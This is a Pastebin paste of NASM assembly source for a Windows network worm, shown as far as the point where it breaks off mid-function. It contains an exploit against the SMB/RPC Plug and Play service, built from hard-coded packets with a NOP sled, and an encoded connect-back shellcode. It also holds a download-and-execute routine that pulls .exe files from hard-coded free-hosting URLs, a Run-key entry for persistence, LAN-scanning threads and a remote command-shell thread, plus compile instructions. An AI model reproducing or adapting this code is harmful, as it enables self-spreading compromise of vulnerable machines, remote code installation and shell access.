API tools faq
paste
Advertisement
FlyFar

PnP.asm

FlyFar
Jun 6th, 2023
765
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 32.12 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. CPU 386
  2. [BITS 32]
  3.  
  4. ;To compile:
  5. ;nasmw -O6 -fwin32 PnP.asm
  6. ;link /RELEASE /entry:entry /subsystem:windows PnP.obj [libs]
  7.  
  8.  
  9. SCAN_THREADS        EQU 10
  10. MAX_THREADS     EQU 80  ;only @AttackPnP threads
  11. TIMEOUT         EQU 5000
  12. SMB_RECV_TIMEOUT    EQU 60  ;seconds
  13. STACK_SIZE      EQU 0x3000  ;only @AttackPnP threads
  14. FL_EXECUTE_URL      EQU 1
  15. FL_NOEXEC_URL       EQU 0
  16.  
  17.  
  18.  
  19. %macro  API 2
  20.     %xdefine    %1  _%1@%2
  21.     extern  %1
  22. %endmacro
  23.  
  24. %macro  API 3
  25.     %xdefine    %1  _%3@%2
  26.     extern  %1
  27. %endmacro
  28.  
  29.  
  30.  
  31. API WSAStartup,         8
  32. API Sleep,              4
  33. API InternetGetConnectedState,  8
  34. API GetVersion,         0
  35. API CreateThread,           24
  36. API ExitThread,         4
  37. API GetCurrentThreadId,     0
  38. API CloseHandle,            4
  39. API GetTickCount,           0
  40. API WaitForSingleObject,        8
  41. API CreateMutex,            12, CreateMutexA
  42. API ReleaseMutex,           4
  43. API InitializeCriticalSection,  4
  44. API EnterCriticalSection,       4
  45. API LeaveCriticalSection,       4
  46. API lstrlen,            4,  lstrlenA
  47. API GetModuleFileName,      12, GetModuleFileNameA
  48. API GetLastError,           0
  49. API ExitProcess,            4
  50. API GetFileSize,            8
  51. API CreateFile,         28, CreateFileA
  52. API WriteFile,          20
  53. API CreateFileMapping,      24, CreateFileMappingA
  54. API MapViewOfFile,          20
  55. API CreateProcess,          40, CreateProcessA
  56. API GetModuleHandle,        4,  GetModuleHandleA
  57. API LoadLibrary,            4,  LoadLibraryA   
  58. API GetProcAddress,         8
  59.  
  60. API RegOpenKeyEx,           20, RegOpenKeyExA
  61. API RegSetValueEx,          24, RegSetValueExA
  62. API RegCloseKey,            4,  RegCloseKey
  63.  
  64.  
  65. API socket,             12
  66. API ioctlsocket,            12
  67. API connect,            12
  68. API bind,               12
  69. API listen,             8
  70. API accept,             12
  71. API select,             20
  72. API closesocket,            4
  73. API getpeername,            12
  74. API getsockname,            12
  75. API gethostname,            8
  76. API gethostbyname,          4
  77. API inet_ntoa,          4
  78. API send,               16
  79. API recv,               16
  80.  
  81.  
  82. %xdefine    wsprintf    _wsprintfA
  83. extern      wsprintf
  84.  
  85. %xdefine    memcpy      _memcpy
  86. extern      memcpy
  87.  
  88.  
  89.  
  90. SOCK_STREAM     EQU 1
  91. SOCK_DGRAM      EQU 2
  92. IPPROTO_UDP     EQU 17
  93. SOMAXCONN       EQU 0x7fffffff
  94.  
  95. ERROR_ALREADY_EXISTS    EQU 183
  96. FIONBIO         EQU 0x8004667e
  97. KEY_WRITE       EQU 0x20006
  98. HKEY_LOCAL_MACHINE  EQU 0x80000002
  99. REG_SZ          EQU 1
  100. FILE_SHARE_READ     EQU 1
  101. OPEN_EXISTING       EQU 3
  102. CREATE_ALWAYS       EQU 2
  103. GENERIC_READ        EQU 0x80000000
  104. GENERIC_WRITE       EQU 0x40000000
  105. PAGE_READONLY       EQU 2
  106. FILE_MAP_READ       EQU 4
  107.  
  108.  
  109. section .bss
  110.  
  111. CONNECTED   resd    1
  112. THREADNUM   resd    1   ;<--|
  113. OSVERSION   resd    1
  114. CS_THREADNUM    resd    6
  115. CS_LOOP     resd    6
  116. MTX_CBACK   resd    1
  117. dwLocalIPs  resd    1
  118. lpLocalIPs  resd    SCAN_THREADS
  119. WSADATA_LEN EQU 400
  120. WSADATA     resb    WSADATA_LEN
  121. dwFileSize  resd    1
  122. dwFilePointer   resd    1
  123. dwFileNameLen   EQU 512
  124. szFileName  resb    dwFileNameLen
  125. HTTP_BUFFER_LEN EQU (1024 * 4)
  126. HTTP_BUFFER resb    HTTP_BUFFER_LEN
  127.  
  128.  
  129.  
  130. section .rdata
  131.  
  132. STR_IPC     DB  '\\%s\IPC$',0
  133. szMutexName DB  'Hiberium',0
  134. szStartupKey    DB  'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
  135. szStartupValue  DB  'MSPRO32',0
  136. STR_WS2_32  DB  'WS2_32',0
  137. STR_WSASocket   DB  'WSASocketA',0
  138. STR_CMD     DB  'cmd',0
  139.  
  140. HTTP_FMT    DB  'GET %s HTTP/1.1', 0dH, 0Ah,
  141.         DB  'Host: %s', 0dH, 0AH,
  142.         DB  'Connection: close',
  143.         DB  0dh, 0ah, 0dh, 0ah, 0
  144.  
  145. URLS        DB  'strtt.interfree.it/VfProtect.exe', 0,
  146.         DB  FL_EXECUTE_URL,
  147.  
  148.         DB  'strtt.interfree.it/Hiberium.rar', 0,
  149.         DB  FL_NOEXEC_URL,
  150.  
  151.         DB  'utenti.lycos.it/strtt/VfProtect2.exe', 0,
  152.         DB  FL_EXECUTE_URL,
  153.  
  154.         DB  'utenti.lycos.it/strtt/Hiberium2.rar', 0,
  155.         DB  FL_NOEXEC_URL,
  156.  
  157.         DB  0   ;end of urls
  158.  
  159.  
  160. SMB_Negotiate   \
  161.     DB     0x00, 0x00, 0x00, 0x85, 0xFF, 0x53, 0x4D, 0x42, 0x72, 0x00, 0x00, 0x00,
  162.     DB     0x00, 0x18, 0x53, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  163.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0x00, 0x00, 0x00, 0x00,
  164.     DB     0x00, 0x62, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4E, 0x45, 0x54, 0x57, 0x4F,
  165.     DB     0x52, 0x4B, 0x20, 0x50, 0x52, 0x4F, 0x47, 0x52, 0x41, 0x4D, 0x20, 0x31,
  166.     DB     0x2E, 0x30, 0x00, 0x02, 0x4C, 0x41, 0x4E, 0x4D, 0x41, 0x4E, 0x31, 0x2E,
  167.     DB     0x30, 0x00, 0x02, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66,
  168.     DB     0x6F, 0x72, 0x20, 0x57, 0x6F, 0x72, 0x6B, 0x67, 0x72, 0x6F, 0x75, 0x70,
  169.     DB     0x73, 0x20, 0x33, 0x2E, 0x31, 0x61, 0x00, 0x02, 0x4C, 0x4D, 0x31, 0x2E,
  170.     DB     0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4C, 0x41, 0x4E, 0x4D, 0x41,
  171.     DB     0x4E, 0x32, 0x2E, 0x31, 0x00, 0x02, 0x4E, 0x54, 0x20, 0x4C, 0x4D, 0x20,
  172.     DB     0x30, 0x2E, 0x31, 0x32, 0x00
  173. SMB_Negotiate_LEN   EQU ($-SMB_Negotiate)
  174.  
  175. SMB_SessionSetupAndX    \
  176.     DB 0x00, 0x00, 0x00, 0xA4, 0xFF, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  177.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
  178.     DB 0x00, 0x00, 0x10, 0x00, 0x0C, 0xFF, 0x00, 0xA4, 0x00, 0x04, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00,
  179.     DB 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x80, 0x69, 0x00, 0x4E,
  180.     DB 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0x97, 0x82, 0x08, 0xE0, 0x00,
  181.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  182.     DB 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,
  183.     DB 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, 0x32, 0x00, 0x31, 0x00, 0x39, 0x00,
  184.     DB 0x35, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00,
  185.     DB 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, 0x35, 0x00,
  186.     DB 0x2E, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00
  187. SMB_SessionSetupAndX_LEN    EQU ($-SMB_SessionSetupAndX)
  188.  
  189. SMB_SessionSetupAndX2   \
  190.     DB 0x00, 0x00, 0x00, 0xDA, 0xFF, 0x53, 0x4D, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  191.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
  192.     DB 0x00, 0x08, 0x20, 0x00, 0x0C, 0xFF, 0x00, 0xDA, 0x00, 0x04, 0x11, 0x0A, 0x00, 0x00, 0x00, 0x00,
  193.     DB 0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD4, 0x00, 0x00, 0x80, 0x9F, 0x00, 0x4E,
  194.     DB 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x46,
  195.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
  196.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x06, 0x00, 0x06, 0x00, 0x40,
  197.     DB 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x47, 0x00, 0x00, 0x00, 0x15, 0x8A, 0x88, 0xE0, 0x48,
  198.     DB 0x00, 0x4F, 0x00, 0x44, 0x00, 0x00, 0xED, 0x41, 0x2C, 0x27, 0x86, 0x26, 0xD2, 0x59, 0xA0, 0xB3,
  199.     DB 0x5E, 0xAA, 0x00, 0x88, 0x6F, 0xC5, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x6F, 0x00,
  200.     DB 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,
  201.     DB 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00,
  202.     DB 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,
  203.     DB 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00
  204. SMB_SessionSetupAndX2_LEN   EQU ($-SMB_SessionSetupAndX2)
  205.  
  206. SMB_TreeConnectAndX \
  207.     DB 0x00, 0x00, 0x00, 0x5A, 0xFF, 0x53, 0x4D, 0x42, 0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  208.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE,
  209.     DB 0x00, 0x08, 0x30, 0x00, 0x04, 0xFF, 0x00, 0x5A, 0x00, 0x08, 0x00, 0x01, 0x00, 0x2F, 0x00, 0x00
  210. SMB_TreeConnectAndX_LEN     EQU ($-SMB_TreeConnectAndX)
  211.  
  212. SMB_TreeConnectAndX_    \
  213.     DB  0x00, 0x00, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x00
  214. SMB_TreeConnectAndX__LEN    EQU ($-SMB_TreeConnectAndX_)
  215.  
  216. SMB_PipeRequest_browser     \
  217.     DB 0x00, 0x00, 0x00, 0x66, 0xFF, 0x53, 0x4D, 0x42, 0xA2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  218.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x78, 0x04,
  219.     DB 0x00, 0x08, 0x40, 0x00, 0x18, 0xFF, 0x00, 0xDE, 0xDE, 0x00, 0x10, 0x00, 0x16, 0x00, 0x00, 0x00,
  220.     DB 0x00, 0x00, 0x00, 0x00, 0x9F, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  221.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  222.     DB 0x02, 0x00, 0x00, 0x00, 0x03, 0x13, 0x00, 0x00, 0x5C, 0x00, 0x62, 0x00, 0x72, 0x00, 0x6F, 0x00,
  223.     DB 0x77, 0x00, 0x73, 0x00, 0x65, 0x00, 0x72, 0x00, 0x00, 0x00
  224. SMB_PipeRequest_browser_LEN EQU ($-SMB_PipeRequest_browser)
  225.  
  226. SMB_PNPEndpoint     \
  227.     DB 0x00, 0x00, 0x00, 0x9C, 0xFF, 0x53, 0x4D, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xC8,
  228.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x78, 0x04,
  229.     DB 0x00, 0x08, 0x50, 0x00, 0x10, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
  230.     DB 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x48, 0x00, 0x54, 0x00, 0x02,
  231.     DB 0x00, 0x26, 0x00, 0x00, 0x40, 0x59, 0x00, 0x00, 0x5C, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00,
  232.     DB 0x45, 0x00, 0x5C, 0x00, 0x00, 0x00, 0x40, 0x00, 0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00,
  233.     DB 0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB8, 0x10, 0xB8, 0x10, 0x00, 0x00, 0x00, 0x00,
  234.     DB 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x40, 0x4E, 0x9F, 0x8D, 0x3D, 0xA0, 0xCE, 0x11,
  235.     DB 0x8F, 0x69, 0x08, 0x00, 0x3E, 0x30, 0x05, 0x1B, 0x01, 0x00, 0x00, 0x00, 0x04, 0x5D, 0x88, 0x8A,
  236.     DB 0xEB, 0x1C, 0xC9, 0x11, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00
  237. SMB_PNPEndpoint_LEN     EQU ($-SMB_PNPEndpoint)
  238.  
  239. RPC_call        \
  240.     DB     0x00, 0x00, 0x08, 0x90, 0xFF, 0x53, 0x4D, 0x42, 0x25, 0x00, 0x00, 0x00,
  241.     DB     0x00, 0x18, 0x07, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  242.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x78, 0x04, 0x00, 0x08, 0x60, 0x00,
  243.     DB     0x10, 0x00, 0x00, 0x3C, 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  244.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x3C,
  245.     DB     0x08, 0x54, 0x00, 0x02, 0x00, 0x26, 0x00, 0x00, 0x40, 0x4D, 0x08, 0x00,
  246.     DB     0x5C, 0x00, 0x50, 0x00, 0x49, 0x00, 0x50, 0x00, 0x45, 0x00, 0x5C, 0x00,
  247.     DB     0x00, 0x00, 0x40, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
  248.     DB     0x3C, 0x08, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x24, 0x08, 0x00, 0x00,
  249.     DB     0x00, 0x00, 0x36, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  250.     DB     0x11, 0x00, 0x00, 0x00, 0x52, 0x00, 0x4F, 0x00, 0x4F, 0x00, 0x54, 0x00,
  251.     DB     0x5C, 0x00, 0x53, 0x00, 0x59, 0x00, 0x53, 0x00, 0x54, 0x00, 0x45, 0x00,
  252.     DB     0x4D, 0x00, 0x5C, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x30, 0x00,
  253.     DB     0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xE0, 0x07, 0x00, 0x00,
  254.     DB     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x07, 0x00, 0x00,
  255.     DB     0x00, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  256.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90,
  257.     DB     0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76,
  258.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90,
  259.     DB     0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76,
  260.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90,
  261.     DB     0x67, 0x15, 0x7A, 0x76, 0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76,
  262.     DB     0xEB, 0x08, 0x90, 0x90, 0x67, 0x15, 0x7A, 0x76, 0x90, 0x90, 0x90, 0x90,
  263.     DB     0x90, 0x90, 0x90, 0xEB, 0x08, 0x90, 0x90, 0x48, 0x4F, 0x44, 0x88, 0x90,
  264.     DB     0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  265.     DB     0x90, 0x90, 0x90, 0x90
  266. RPC_call_LEN        EQU ($-RPC_call)
  267.  
  268. RPC_call_end        \
  269.     DB 0xE0, 0x07, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
  270. RPC_call_end_LEN    EQU ($-RPC_call_end)
  271.  
  272.  
  273.  
  274. section .data
  275.  
  276. SHELLCODE_IP        EQU 327
  277. SHELLCODE_PORT      EQU 334
  278. SHELLCODE_XORIP     EQU 0x154F1E2D
  279. SHELLCODE_XORPORT   EQU 0x2d15
  280.  
  281.  
  282.  
  283. ;download connect
  284. shellcode       \
  285.     DB     0x33, 0xC9, 0x81, 0xE9, 0x92, 0xFF, 0xFF, 0xFF, 0xE8, 0xFF, 0xFF, 0xFF,
  286.     DB     0xFF, 0xC0, 0x5E, 0x81, 0x76, 0x0E, 0x2D, 0x1E, 0x4F, 0x15, 0x83, 0xEE,
  287.     DB     0xFC, 0xE2, 0xF4, 0xD1, 0xF6, 0x32, 0x15, 0x2D, 0x1E, 0x1A, 0x43, 0x7A,
  288.     DB     0x95, 0x0C, 0x29, 0xA0, 0x6A, 0x4C, 0x6D, 0x80, 0xE1, 0x79, 0x14, 0xF5,
  289.     DB     0x4E, 0xC4, 0x5D, 0x35, 0x95, 0x27, 0x35, 0x2C, 0xC3, 0xAC, 0x49, 0x64,
  290.     DB     0x95, 0x3B, 0x98, 0x2D, 0x1F, 0x91, 0x24, 0xD2, 0x2F, 0x8F, 0xB9, 0x15,
  291.     DB     0xFE, 0x3B, 0x12, 0xEC, 0xD1, 0x42, 0x14, 0xEA, 0xF5, 0xBD, 0x2C, 0xFA,
  292.     DB     0x6B, 0xAC, 0x48, 0xA6, 0x4B, 0x6B, 0x14, 0xF7, 0x78, 0xC4, 0x19, 0x67,
  293.     DB     0x95, 0x1A, 0x09, 0x2C, 0xC4, 0xC4, 0x11, 0xA7, 0x1F, 0x97, 0x4C, 0x7D,
  294.     DB     0x37, 0xA7, 0x2C, 0xE5, 0x46, 0x38, 0x32, 0xBB, 0x9D, 0xA3, 0x55, 0xA4,
  295.     DB     0xF9, 0xE5, 0xB9, 0x11, 0x30, 0x3A, 0xEF, 0xEB, 0x19, 0x4F, 0x9C, 0xCA,
  296.     DB     0x59, 0xC4, 0x79, 0x09, 0x56, 0x18, 0xEA, 0x78, 0xE6, 0x19, 0x45, 0xD2,
  297.     DB     0x4B, 0xBB, 0x96, 0xE9, 0x26, 0xFE, 0x14, 0xAE, 0xDA, 0x47, 0x4A, 0x73,
  298.     DB     0x43, 0x8C, 0x71, 0x8C, 0x2E, 0x4F, 0x15, 0x2D, 0x9B, 0x8F, 0x6D, 0x21,
  299.     DB     0x95, 0x0F, 0x19, 0xA6, 0x6E, 0x53, 0xB8, 0xA6, 0x46, 0x47, 0xFE, 0x24,
  300.     DB     0x95, 0x0F, 0x21, 0xA6, 0x86, 0xF7, 0x15, 0x2D, 0x1E, 0x10, 0x9C, 0xC8,
  301.     DB     0x4D, 0xF5, 0x9B, 0x63, 0x10, 0xA3, 0xEA, 0xFA, 0x4E, 0xF5, 0xBF, 0xD1,
  302.     DB     0x13, 0x33, 0xEA, 0xFA, 0x4E, 0x1F, 0xFD, 0x39, 0x1E, 0x4F, 0x15, 0xD6,
  303.     DB     0x89, 0xB2, 0x1A, 0x88, 0x09, 0x4F, 0x69, 0x32, 0x67, 0x45, 0xFD, 0xC2,
  304.     DB     0xD0, 0xAF, 0x75, 0x5F, 0xE0, 0xFC, 0x03, 0x73, 0x74, 0x4A, 0x4C, 0x7C,
  305.     DB     0xB3, 0xDD, 0xEA, 0xFA, 0x47, 0x1F, 0xF7, 0xDA, 0xF6, 0x53, 0x15, 0x2D,
  306.     DB     0x1E, 0x18, 0x46, 0x1F, 0x41, 0x7C, 0x27, 0x2D, 0x1E, 0x84, 0xF8, 0xD1,
  307.     DB     0x25, 0x21, 0x1E, 0x02, 0x57, 0xA8, 0x6C, 0xEB, 0x67, 0xA3, 0xEC, 0x87,
  308.     DB     0x7E, 0xF9, 0x0C, 0x35, 0xF9, 0x11, 0x43, 0xD2, 0x4B, 0xB7, 0x86, 0x47,
  309.     DB     0x1B, 0x16, 0xB8, 0x80, 0x4F, 0xE2, 0x87, 0xD2, 0xC9, 0x16, 0x45, 0xCF,
  310.     DB     0xE9, 0xCE, 0xF9, 0x2D, 0x1C, 0x4F, 0x15, 0x79, 0x74, 0x4D, 0xEA, 0x78,
  311.     DB     0xC6, 0x7E, 0xD5, 0x7D, 0x4E, 0x1F, 0x7F, 0x2C, 0x74, 0x4D, 0xEA, 0x78,
  312.     DB     0xCA, 0xDC, 0x7D, 0x52, 0x1E, 0x4F, 0x14, 0x45, 0x1C, 0x4F, 0x37, 0x3C,
  313.     DB     0x97, 0xAD, 0x7F, 0x2D, 0x74, 0x49, 0x7F, 0x2F, 0x74, 0x4F, 0x7F, 0x2C,
  314.     DB     0x76, 0x4F, 0x15, 0x2D, 0x5E, 0xA7, 0x1E, 0x2D, 0x1E, 0x4F, 0x78, 0x5E,
  315.     DB     0x7D, 0x2E, 0x61, 0x5D, 0x30, 0x2A, 0x6D, 0x48, 0x1E, 0x17, 0x9C, 0x68,
  316.     DB     0xEE, 0x1F, 0x7F, 0x3D, 0x4C, 0x1C, 0xEA, 0x78, 0xD2, 0x46, 0xD5, 0x58,
  317.     DB     0x36, 0xB0, 0x40, 0xC5, 0x88, 0x0F, 0x61, 0x0C, 0x97, 0xA8, 0x7F, 0x2D,
  318.     DB     0x76, 0x4F, 0x17, 0x2D, 0x1E, 0x18, 0x46, 0xD2, 0x4B, 0x87, 0x1C, 0xED,
  319.     DB     0x60, 0x44, 0x7F, 0x2D, 0x4A, 0x1F, 0x42, 0x7B, 0xE1, 0x1A, 0xF1, 0xC6,
  320.     DB     0xFB, 0x19, 0xEA, 0x78, 0xF2, 0x1C, 0xEA, 0x78, 0xCE, 0x1B, 0x98, 0x51,
  321.     DB     0x3A, 0x5B, 0x42, 0x1C, 0xDE, 0x25, 0x51, 0x74, 0x97, 0x40, 0x52, 0xDE,
  322.     DB     0xB4, 0xFE, 0x12, 0x7D, 0xFC, 0xB2, 0xEA, 0x58, 0xEE, 0xB0, 0x40, 0xF1,
  323.     DB     0xE1, 0x1A, 0xF9, 0xD2, 0x4B, 0xA3, 0x7F, 0x2D, 0xE1, 0x1A, 0xF5
  324.  
  325. shellcode_LEN       EQU ($-shellcode)
  326.  
  327.  
  328.  
  329.  
  330.  
  331. section .text execute
  332. GLOBAL _entry
  333.  
  334.  
  335. _entry:
  336.     mov ebp, esp
  337.     push szMutexName
  338.     push 1
  339.     push 0
  340.     call CreateMutex
  341.     call GetLastError
  342.     cmp eax, ERROR_ALREADY_EXISTS
  343.     jne .1st
  344.  
  345.     push 0
  346.     call ExitProcess
  347.  
  348. .1st
  349.     mov esi, WSADATA
  350.     push esi        ;[ebp - 4]
  351.     push esi
  352.     push byte 2
  353.     call WSAStartup
  354.  
  355.     call GetVersion
  356.     mov [OSVERSION], eax
  357.  
  358.     push CS_LOOP
  359.     call InitializeCriticalSection
  360.     push CS_THREADNUM
  361.     call InitializeCriticalSection
  362.  
  363.     xor eax, eax
  364.     mov [THREADNUM], eax
  365.     push eax
  366.  
  367.     push esp        ;phkResult
  368.     push KEY_WRITE
  369.     push eax
  370.     push szStartupKey
  371.     push HKEY_LOCAL_MACHINE
  372.  
  373.     push eax
  374.     push eax
  375.     push eax
  376.     call CreateMutex
  377.     mov [MTX_CBACK], eax
  378.  
  379.     call RegOpenKeyEx
  380.     pop ebx
  381.     or eax, eax
  382.     jnz .reg1
  383.  
  384.     mov esi, [ebp - 4]
  385.     mov BYTE [esi], '"'
  386.     push esi
  387.     push esi        ;lstrlen
  388.     inc esi
  389.  
  390.     push WSADATA_LEN-1
  391.     push esi
  392.     push eax
  393.     call GetModuleFileName
  394.     call lstrlen
  395.     pop esi
  396.     mov BYTE [esi + eax], '"'
  397.     inc eax
  398.     mov BYTE [esi + eax], 0
  399.     inc eax
  400.  
  401.     push eax
  402.     push esi
  403.     push REG_SZ
  404.     push 0
  405.     push szStartupValue
  406.     push ebx
  407.     call RegSetValueEx
  408.  
  409.     push ebx
  410.     call RegCloseKey
  411.  
  412. .reg1
  413.     xor eax, eax
  414.     push eax
  415.  
  416.     push esp
  417.     push eax
  418.     push eax
  419.     push @FileServer
  420.     push eax
  421.     push eax
  422.     call CreateThread
  423.     push eax
  424.     call CloseHandle
  425.  
  426.  
  427.  
  428. .NotConn                ;Primary Thread loop
  429.     push dword TIMEOUT
  430.     call Sleep
  431.  
  432.     push 0
  433.     push esp
  434.     call InternetGetConnectedState
  435.     or eax, eax
  436.     jz .NotConn
  437.  
  438.     mov [CONNECTED], eax        ;TRUE
  439.  
  440.     call @InitShellcode
  441.     call @Download
  442.  
  443.     push byte SCAN_THREADS
  444.     pop ecx
  445.     mov edi, lpLocalIPs
  446.     push edi
  447.     call @GetLocalIPs
  448.  
  449.     mov eax, [OSVERSION]
  450.     or eax, eax
  451.     sets al
  452.     movzx eax, al
  453.     dec eax
  454.  
  455.     push SCAN_THREADS -1
  456.     pop ecx
  457.     AND ecx, eax
  458.     inc ecx
  459.     inc ecx
  460.  
  461.     pop esi
  462.     mov edi, [dwLocalIPs]
  463.  
  464. .CreateScanThreads
  465.     push ecx
  466.  
  467.     xor edx, edx
  468.     push WSADATA        ;lpThreadID
  469.     push edx        ;dwCreationFlags
  470.     xor eax, eax
  471.     or edi, edi
  472.     jz .Nip
  473.  
  474.     lodsd
  475.     dec edi
  476. .Nip
  477.     push eax        ;lpParameter (local IPs)
  478.     push @Scan      ;lpStartRoutine
  479.     dec ecx
  480.     jnz .scan
  481.  
  482. .cback
  483.     pop eax
  484.     push @Cback     ;Cback shell thread
  485. .scan
  486.     push edx
  487.     push edx
  488.     call CreateThread
  489.     push eax
  490.     call CloseHandle
  491.     pop ecx
  492.     loop .CreateScanThreads
  493.  
  494. .Conn
  495.     push dword TIMEOUT
  496.     call Sleep
  497.  
  498.     push 0
  499.     push esp
  500.     call InternetGetConnectedState
  501.     or eax, eax
  502.     jnz .Conn
  503.  
  504.     mov [CONNECTED], eax        ;FALSE
  505.     jmp .NotConn
  506.  
  507.  
  508.  
  509. @InitShellcode:
  510.     push ebp
  511.     mov ebp, esp
  512.  
  513.     xor eax, eax
  514.     push eax
  515.     push eax
  516.  
  517.     push byte IPPROTO_UDP
  518.     push byte SOCK_DGRAM
  519.     push byte 2
  520.     call socket
  521.     xchg ebx, eax
  522.  
  523.     push 0xBECF3752
  524.     push 0x11220002
  525.  
